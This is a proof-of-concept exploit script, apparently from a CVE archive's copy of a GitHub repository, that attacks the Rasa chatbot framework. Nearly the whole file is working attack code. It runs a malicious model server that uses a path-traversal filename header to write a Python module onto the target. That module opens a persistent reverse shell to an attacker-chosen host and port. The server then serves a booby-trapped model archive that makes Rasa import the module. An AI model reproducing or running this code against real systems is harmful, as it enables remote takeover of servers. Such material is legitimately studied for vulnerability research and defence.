5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / reverse_server.py PY
import argparse
import datetime
import http.server
import socketserver
from pathlib import Path
from typing import List


BASE_DIR = Path(__file__).resolve().parent
DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz"


def build_pwnmod(reverse_host: str, reverse_port: int) -> bytes:
    """Build pwnmod.py for the Rasa graph import chain."""
    payload = f"""import os
import pty
import socket
import threading
import time


def _launch():
    # Runs when Python imports pwnmod. It keeps trying to connect back.
    while True:
        s = None
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(("{reverse_host}", {reverse_port}))
            os.dup2(s.fileno(), 0)
            os.dup2(s.fileno(), 1)
            os.dup2(s.fileno(), 2)
            pty.spawn("/bin/sh")
        except Exception:
            pass
        finally:
            try:
                if s:
                    s.close()
            except Exception:
                pass
        time.sleep(5)


# Import side effect: Rasa imports pwnmod before it gets Pwn.
threading.Thread(target=_launch, daemon=True).start()


class Pwn:
    @classmethod
    def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs):
        return cls()

    @staticmethod
    def get_default_config():
        return {{}}

    def provide(self, **kwargs):
        return None
"""
    return payload.encode("utf-8")


class Handler(http.server.BaseHTTPRequestHandler):
    server_version = "RasaStage2/1.0"

    def do_GET(self) -> None:
        if self.path.startswith("/write-module"):
            # First request: abuse the model-server filename header to write /app/pwnmod.py.
            self.server.hits.append(self._hit("write-module"))
            self._send_file(
                self.server.pwnmod,
                "text/plain; charset=utf-8",
                self.server.module_filename,
                "stage2-write-module",
            )
            return

        if self.path.startswith("/model"):
            # Second request: serve the model whose metadata.json uses pwnmod.Pwn.
            self.server.hits.append(self._hit("model"))
            self._send_file(
                self.server.evil_model.read_bytes(),
                "application/x-tar",
                self.server.model_filename,
                "stage2-evil-model",
            )
            return

        if self.path.startswith("/hits"):
            body = "\n".join(self.server.hits).encode("utf-8") + b"\n"
            self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits")
            return

        if self.path.startswith("/healthz"):
            self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz")
            return

        self.send_response(404)
        self.end_headers()
        self.wfile.write(b"not found\n")

    def _hit(self, route: str) -> str:
        ts = datetime.datetime.utcnow().isoformat(timespec="seconds") + "Z"
        return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}"

    def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None:
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.send_header("ETag", etag)
        self.send_header("filename", filename)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt: str, *args) -> None:
        print(f"{self.address_string()} - {fmt % args}", flush=True)


class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    allow_reuse_address = True

    pwnmod: bytes
    evil_model: Path
    module_filename: str
    model_filename: str
    hits: List[str]


def main() -> None:
    parser = argparse.ArgumentParser(description="Minimal Rasa stage2 model server")
    parser.add_argument("--listen", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8000)
    parser.add_argument("--reverse-host", required=True)
    parser.add_argument("--reverse-port", type=int, default=4444)
    parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL)
    parser.add_argument("--module-filename", default="../../app/pwnmod.py")
    parser.add_argument("--model-filename", default="evil_import_model.tar.gz")
    args = parser.parse_args()

    if not args.evil_model.exists():
        raise SystemExit(f"missing evil model archive: {args.evil_model}")

    with ThreadingTCPServer((args.listen, args.port), Handler) as httpd:
        httpd.pwnmod = build_pwnmod(args.reverse_host, args.reverse_port)
        httpd.evil_model = args.evil_model
        httpd.module_filename = args.module_filename
        httpd.model_filename = args.model_filename
        httpd.hits = []

        base = f"http://{args.listen}:{args.port}"
        print(f"listening: {base}", flush=True)
        print(f"write module url: {base}/write-module", flush=True)
        print(f"evil model url: {base}/model", flush=True)
        print(f"reverse shell: {args.reverse_host}:{args.reverse_port}", flush=True)
        httpd.serve_forever()


if __name__ == "__main__":
    main()